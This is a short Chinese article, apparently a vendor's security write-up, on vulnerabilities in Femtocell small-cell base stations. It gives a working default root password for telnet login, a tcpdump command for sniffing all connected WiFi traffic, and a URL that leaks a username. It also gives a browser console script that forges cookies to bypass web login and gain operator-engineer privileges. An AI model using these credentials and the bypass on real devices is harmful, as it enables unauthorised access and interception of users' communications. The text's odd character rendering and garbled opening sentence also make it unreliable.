移動(dòng)互聯(lián)網(wǎng)發(fā)展到帳用戶(hù)對(duì)短信、通話、數(shù)據(jù)流需求劇增，轉(zhuǎn)向互動(dòng)任意短信需求，而Femtocell設(shè)備可以被改造成偽基站短信群發(fā)器，截取家庭任意短信隱私，移動(dòng)短信安全通信漏洞凸顯。

　　近日，有部分運(yùn)營(yíng)商通報(bào)Femtocell雖能瞬間解決室內(nèi)ip網(wǎng)絡(luò)覆蓋問(wèn)題，但是漏洞問(wèn)題百出，很多廠家已經(jīng)對(duì)全網(wǎng)設(shè)備進(jìn)行緊急修復(fù)，漏洞暫時(shí)已經(jīng)修復(fù)完成，但是漏洞問(wèn)題還會(huì)存在嗎？

　　樂(lè)信揭秘Femtocell任意漏洞三大細(xì)節(jié)：

　　①root弱密碼

　　可以直接telnet登錄，然后就是一個(gè)擁有root權(quán)限的Linux shell了。

　　$ telnet 192.168.197.1

　　login: root

　　password: 5up

　　順便提一句，這個(gè)密碼應(yīng)該是Atheros的參考設(shè)計(jì)板PB44的默認(rèn)密碼，很多廠商拿來(lái)都不改。在搜索引擎上以"5up"和"root"為關(guān)鍵詞，可以搜索到不少有趣的東西。

　　并且發(fā)現(xiàn)上面的busybox基本沒(méi)有裁剪，甚至連tcpdump功能都有。

　　于是，可以直接抓取到所有連上此WiFi的流量:

　　busybox tcpdump -i br0 not port 23

　　② 其它利用方式

　　/mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件，可以使用sqlitebrowser直接查看

　　閃燈 /mnt/flash/led_ctrl.sh [on|off]

　　③ RF 板卡滲透：Web 登錄繞過(guò)

　　訪問(wèn) http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 獲得用戶(hù)名為

　　abmoc@24320

　　然后在USER.js里發(fā)現(xiàn)原有的登錄繞過(guò)問(wèn)題沒(méi)有得到修復(fù)，于是在瀏覽器中打開(kāi)Console，輸入以下腳本即可登錄:

　　SetCookie('role', 'marketUser');

　　SetCookie('username', 'abmoc@24320');

　　SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);

　　document.cookie = "loginFlag=1;";

　　window.top.location = 'main.asp?r=' + Math.random() + '#index';

　　登錄之后，我們就擁有了與運(yùn)營(yíng)商派過(guò)來(lái)開(kāi)站的工程師完全一樣的操作權(quán)限！